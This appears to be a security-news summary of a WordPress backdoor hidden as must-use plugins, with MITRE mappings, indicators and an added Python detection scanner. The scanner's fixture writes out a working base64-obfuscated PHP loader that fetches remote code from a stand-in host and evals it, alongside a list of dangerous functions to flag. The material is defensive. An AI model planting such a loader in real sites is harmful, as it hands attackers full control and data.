This article summarizes a real-life incident in which malware was found deeply embedded in a WordPress website, using backdoors planted as must-use plugins to execute code fetched from a remote server. The malware relies on obfuscation and multiple persistence mechanisms to avoid detection and removal, posing a severe risk to site security and data integrity.
Affected: WordPress websites
Keypoints :
- Malware was hidden in a WordPress website as PHP files placed in the wp-content/mu-plugins directory.
- Must-use plugins are loaded automatically on every request and cannot be deactivated from the WordPress dashboard, so the code keeps running as long as the file exists.
- Obfuscated PHP (base64-encoded function names and strings) was used to hide the loader logic and to fetch and evaluate arbitrary code from external sources.
- Such code runs with the web server's privileges and full access to the site, so it can give attackers complete control over the site (and potentially the server), leading to data theft and reputation damage.
- The attackers planted multiple backdoors so that removing one would not end their access to the compromised site.
- Regular file scanning, file-integrity monitoring and website hardening are essential to detect and prevent malware and backdoors of this kind.
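The loader pattern described in the keypoints (a must-use plugin that base64-decodes a function name, fetches a payload from a remote URL and evals it) can be hunted for with a small static scanner. The script below is an added example, not code from the Sucuri post or from the malware it describes; the fixture site, file names and the example.invalid URL are constructed for illustration, and the list of flagged functions is an assumption chosen to cover fetch-and-eval backdoors.

```python
"""Added example (not from the Sucuri post): a static scanner for the
obfuscated mu-plugin backdoor pattern described above. The sample site,
its file contents and the URL it embeds are constructed fixtures."""
import base64
import binascii
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List, Optional

# Assumed list of PHP functions a fetch-and-eval backdoor needs. A bare
# call, or a base64 literal that decodes to one of these names, is worth a look.
DANGEROUS_FUNCS = frozenset({
    "eval", "assert", "system", "exec", "shell_exec", "passthru",
    "file_get_contents", "file_put_contents", "curl_exec", "create_function",
})

_CALL_RE = re.compile(r"\b(" + "|".join(sorted(DANGEROUS_FUNCS)) + r")\s*\(")
_B64_RE = re.compile(r"""['"]([A-Za-z0-9+/]{8,}={0,2})['"]""")
_VARFUNC_RE = re.compile(r"\$\w+\s*\(")            # $f(...): variable function call
_URL_RE = re.compile(r"""['"]https?://[^'"]+['"]""")


@dataclass
class Finding:
    path: str      # relative to the WordPress root
    reason: str
    detail: str


def _decode_b64(token: str) -> Optional[str]:
    """Decode a base64 literal to ASCII text, or return None if it is not one."""
    try:
        return base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def scan_php(relpath: str, code: str) -> List[Finding]:
    """Flag the constructs the obfuscated loader relies on."""
    findings = []
    for m in _CALL_RE.finditer(code):
        findings.append(Finding(relpath, "direct call", m.group(1)))
    for m in _B64_RE.finditer(code):
        decoded = _decode_b64(m.group(1))
        if decoded is None:
            continue
        if decoded in DANGEROUS_FUNCS:
            # e.g. ZmlsZV9nZXRfY29udGVudHM= -> file_get_contents
            findings.append(Finding(relpath, "base64-hidden function name", decoded))
        elif decoded.startswith(("http://", "https://")) or "<?php" in decoded:
            findings.append(Finding(relpath, "base64-hidden URL or PHP payload", decoded[:60]))
    if _VARFUNC_RE.search(code) and _B64_RE.search(code):
        findings.append(Finding(relpath, "variable function call next to base64 literal", ""))
    for m in _URL_RE.finditer(code):
        findings.append(Finding(relpath, "remote URL literal", m.group(0)))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Scan every .php file below root (mu-plugins, plugins, themes, uploads)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_php(os.path.relpath(full, root), fh.read()))
    return findings


def list_mu_plugins(root: str) -> List[str]:
    """Every .php file here runs on every request and cannot be deactivated from
    the dashboard, so the whole listing should match what you actually installed."""
    mu = os.path.join(root, "wp-content", "mu-plugins")
    if not os.path.isdir(mu):
        return []
    return sorted(n for n in os.listdir(mu) if n.endswith(".php"))


def build_sample_site() -> str:
    """Constructed fixture: one benign and one backdoored must-use plugin."""
    root = tempfile.mkdtemp(prefix="wp-")
    mu = os.path.join(root, "wp-content", "mu-plugins")
    os.makedirs(mu)
    os.makedirs(os.path.join(root, "wp-content", "uploads", "2024", "12"))
    url_b64 = base64.b64encode(b"http://example.invalid/payload.txt").decode()
    backdoor = (
        "<?php\n"
        "$f = base64_decode('ZmlsZV9nZXRfY29udGVudHM=');\n"   # file_get_contents
        f"$u = base64_decode('{url_b64}');\n"                  # hidden payload URL
        "eval($f($u));\n"                                      # fetch, then run
    )
    benign = "<?php\n/* Plugin Name: Site tweaks */\nadd_filter('xmlrpc_enabled', '__return_false');\n"
    with open(os.path.join(mu, "index.php"), "w") as fh:
        fh.write(backdoor)
    with open(os.path.join(mu, "site-tweaks.php"), "w") as fh:
        fh.write(benign)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    print("must-use plugins:", list_mu_plugins(site))
    for f in scan_tree(site):
        print(f"{f.path}: {f.reason} {f.detail}".rstrip())
```

Point scan_tree at a real WordPress root to triage it; the base64 check is what surfaces loaders whose dangerous function names never appear in clear text, and list_mu_plugins gives the inventory to compare against the must-use plugins you deployed yourself.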
MITRE Techniques :
- Tactic: Exfiltration – Technique: Exfiltration Over C2 Channel (T1041) – Procedure: Remotely executed code can read and send data from the infected server back over the same HTTP channel.
- Tactic: Execution – Technique: Command and Scripting Interpreter (T1059) – Procedure: Executing arbitrary PHP by evaluating payloads fetched from external sources.
- Tactic: Command and Control – Technique: Application Layer Protocol: Web Protocols (T1071.001) – Procedure: Using outbound HTTP requests to fetch instructions and maintain control over the compromised site.
- Tactic: Persistence – Technique: Server Software Component: Web Shell (T1505.003) – Procedure: Installing additional PHP backdoors, including must-use plugins, to ensure long-term access to the server.
Indicator of Compromise :
- [File] /wp-content/mu-plugins/index.php
- [File] /wp-content/mu-plugins/test-mu-plugin.php
- [Directory] /wp-content/uploads/2024/12/
- [URL] http://malicious[.]com/path (placeholder illustrating the remote payload URL pattern, not an actual indicator)
- [Base64-Encoded PHP] ZmlsZV9nZXRfY29udGVudHM= (decodes to file_get_contents, the function name hidden in the obfuscated loader)
Full Story: https://blog.sucuri.net/2025/02/hidden-backdoors-uncovered-in-wordpress-malware-investigation.html